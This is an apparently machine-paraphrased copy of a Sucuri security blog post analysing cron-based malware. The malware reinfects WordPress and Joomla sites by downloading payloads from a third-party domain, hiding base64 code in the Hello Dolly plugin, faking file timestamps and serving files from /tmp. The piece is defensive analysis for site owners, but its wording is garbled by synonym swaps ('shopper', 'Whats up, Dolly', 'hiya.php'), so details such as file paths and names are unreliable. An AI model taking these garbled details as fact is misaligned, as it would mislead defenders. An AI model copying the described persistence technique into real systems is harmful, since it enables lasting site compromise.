We just lately had a shopper that had a persistent malware an infection on their shared internet hosting atmosphere that will re-infect the recordsdata shortly after we had cleaned them. The persistence was being created by a cron that was scheduled to obtain malware from a 3rd celebration area.
This persistent web site malware an infection made us keep in mind a weblog submit we posted again in 2014. Because it seems, the malware operated virtually identically — and on this more moderen case, it was infecting a WordPress web site. This malware has been configured to detect WordPress and Joomla based mostly on their listing constructions:
As soon as the malware has decided if the web site is utilizing Joomla or WordPress, it determines the strategy it can use to additional infect the web site recordsdata.
On this case, our shopper’s web site was utilizing WordPress. The malware proceeded to protect the prevailing timestamps of the default WordPress plugin “Whats up, Dolly”, then makes an attempt to cover base64 encoded malware to the plugin file ./wp-content/plugins/hiya.php:
After all the backup backdoor cron job has been arrange in order that, within the occasion that the web site proprietor have been to scrub their web sites recordsdata and even restore from a backup, they might nonetheless be reinfected:
Over the previous 5-Eight years it appears to be like just like the malware operators have modified from distributing the malware from the previous area hestonsflorist[.]com to the present one at hestonsflorists[.]com. Aside from this explicit element, their cron instructions are virtually an identical to the identical malicious cron we discovered again in 2014.
The attackers even assign the identical pretend timestamp (201104202045) utilizing contact to attempt to trick site owners — which these days would in all probability be much more suspicious, because the pretend timestamp displays a date over Eight years previous.
On this explicit an infection, malicious recordsdata are served from the /tmp listing, which is never scanned or monitored and makes it troublesome to detect.
On account of the truth that many web site house owners merely not being conscious of the cron jobs which might be set to run on their internet hosting account, this model of backdoor will be very persistent and show irritating because the web sites won’t ever be protected till the malicious cron is eliminated.
Latest Articles By Writer
*** It is a Safety Bloggers Community syndicated weblog from Sucuri Weblog authored by Luke Leal. Learn the unique submit at: https://weblog.sucuri.internet/2019/05/return-to-the-city-of-cron-malware-infections-on-joomla-and-wordpress.html